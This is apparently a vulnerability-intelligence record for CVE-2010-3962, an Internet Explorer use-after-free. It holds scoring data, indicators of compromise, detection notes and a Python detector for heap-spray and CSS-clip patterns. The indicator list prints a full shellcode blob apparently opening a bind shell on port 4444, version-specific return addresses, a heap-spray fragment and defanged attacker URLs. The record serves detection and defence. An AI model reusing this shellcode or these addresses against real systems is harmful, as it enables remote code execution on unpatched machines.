CVE-2010-3962
published 2010-11-05


Priority: P1 (86, high)
CVSS 3.1: 8.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)
Flags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2025-10-27
Exploited in the wild
EPSS: 96.89% (99.9th percentile)
Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010.

Affected (3 ranges)

Vendor     Product            Version range   Fixed in
microsoft  internet_explorer
microsoft  internet_explorer
microsoft  internet_explorer

Detection & IOCs (extracted from sources)

url: hxxp://www.dxcdfghg.com/2.html
url: hxxp://www.dxcdfghg.com/2.js
port: 4444
other: FAKEOBJ = unescape("%u0d0d%u0d0d")
other: mshtml.dll 6.0.2900.3698 Ret=0x5c7dc9d0
other: mshtml.dll 7.0.5730.13 Ret=0x597e85f9
bytes (shellcode, as quoted in the source):
%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff
  • Exploit combines CVE-2010-0806 and CVE-2010-3962 in a single HTML/JS page; look for heap spray patterns using repeated '%u0d0d%u0d0d' NOP sleds alongside CSS clip attribute manipulation in the same document.
  • Exploit delivery involves obfuscated JavaScript (.js) loaded from the same malicious domain as the HTML page; detect co-loading of obfuscated JS from newly-registered or low-reputation domains alongside CSS token sequences.
  • The exploit targets mshtml.dll via a specially crafted CSS tag with the clip attribute; monitor for iexplore.exe crashes or abnormal child process spawning from iexplore.exe on IE 6/7/8.
  • The vtable corruption causes EIP to land at [vtable+0x30+1]; the exact landing address is mshtml.dll version-dependent. Heap spray targets 0x0d0d0d0d; alert on large allocations of repeated 0x0d0d0d0d patterns in browser process memory.
  • Shellcode opens a bind shell on TCP port 4444; monitor for iexplore.exe listening on or connecting to port 4444.
  • Hosting multiple malicious domains on one IP is common; pivot on the IP of dxcdfghg.com to identify co-hosted malicious infrastructure.
  • The Metasploit module only has working return addresses for IE6 and IE7; IE8 targets are commented out as non-functional, meaning the module will not reliably exploit IE8 despite the CVE affecting it.
  • The exploit return address is not attacker-controlled and is entirely dependent on the loaded mshtml.dll version; some versions land EIP in non-exploitable regions (kernel space, another module), making exploitation version-sensitive.
  • DEP/ASLR bypass is not implemented in the public PoC exploit; ROP-based bypass is also noted as unlikely due to the non-controllable program counter value.
  • The public PoC exploit (exploit-db 15421) is described as 'quick and dirty' with no DEP/ASLR bypass; heap spray allocation sizes are hardcoded per mshtml.dll version and must be adjusted for other versions.
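A small content-inspection check for the co-occurrence rule in the notes above (a repeated %u0d0d sled plus a CSS clip property in the same document, and a .js co-loaded from the host that served the page), as an added example that is not part of this record or of any vendor or Metasploit code. The host example.invalid, the four-fragment run threshold, the verdict tiers and the two sample documents are constructed for illustration; the sample carries only the indicator fragments, no payload.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Indicator patterns. The '%u0d0d' fragment is the NOP-sled building block quoted
# in the IOC list; the minimum run of 4 is a constructed threshold, not from the page.
SPRAY_SLED = re.compile(r"(?:%u0d0d){4,}", re.IGNORECASE)
UNESCAPE_CALL = re.compile(r"\bunescape\s*\(", re.IGNORECASE)
CSS_CLIP = re.compile(r"\bclip\s*:", re.IGNORECASE)
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
SLED_FRAGMENT_LEN = len("%u0d0d")


@dataclass
class Finding:
    verdict: str                      # "clean", "weak" or "suspicious"
    indicators: List[str] = field(default_factory=list)


def score_document(html: str, page_host: Optional[str] = None) -> Finding:
    """Classify one HTML document by the co-occurrence rule from the notes above.

    'suspicious' needs the %u0d0d sled and a CSS clip property in the same
    document. Either alone is only 'weak' (clip is an ordinary CSS property and
    unescape() is common in legitimate code), so single hits do not page anyone.
    """
    indicators: List[str] = []

    # Count sled fragments across all runs, so a long spray string scores higher.
    fragments = sum(len(m) // SLED_FRAGMENT_LEN for m in SPRAY_SLED.findall(html))
    if fragments:
        indicators.append(f"%u0d0d sled fragments: {fragments}")
    has_unescape = bool(UNESCAPE_CALL.search(html))
    if has_unescape:
        indicators.append("unescape() call")
    has_clip = bool(CSS_CLIP.search(html))
    if has_clip:
        indicators.append("CSS clip property")

    # Co-loaded .js from the host that served the page (the delivery pattern in the notes).
    for src in SCRIPT_SRC.findall(html):
        if page_host and urlparse(src).hostname == page_host and src.lower().endswith(".js"):
            indicators.append(f"same-host external script: {src}")

    if fragments and has_clip:
        verdict = "suspicious"
    elif fragments or (has_unescape and has_clip):
        verdict = "weak"
    else:
        verdict = "clean"
    return Finding(verdict, indicators)


# Constructed sample documents (not captured from the real campaign; the host is a
# placeholder). SUSPICIOUS_SAMPLE carries only the indicator fragments, no payload.
SUSPICIOUS_SAMPLE = (
    '<html><head><script src="http://example.invalid/2.js"></script>'
    '<style>#x { clip: rect(0px, 0px, 0px, 0px); }</style></head>'
    '<body><script>var FAKEOBJ = unescape("%u0d0d%u0d0d%u0d0d%u0d0d%u0d0d%u0d0d");'
    '</script></body></html>'
)
BENIGN_SAMPLE = '<div style="clip: rect(0px, 0px, 10px, 10px)">thumbnail</div>'


if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        finding = score_document(doc, page_host="example.invalid")
        print(f"{name}: {finding.verdict} {finding.indicators}")
```

The verdict tiers encode the point made in the notes: a clip property on its own is everyday CSS, and unescape() on its own is everyday JavaScript, so only the combination of the sled with clip handling in one document is worth an alert; the same-host .js co-load is reported as context rather than as a trigger.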

CVSS provenance

Source     Version   Score   Severity   Vector
nvd        v3.1      8.1     HIGH       CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0      9.3     CRITICAL   AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck  -         8.1     HIGH
cisa       -         8.1     HIGH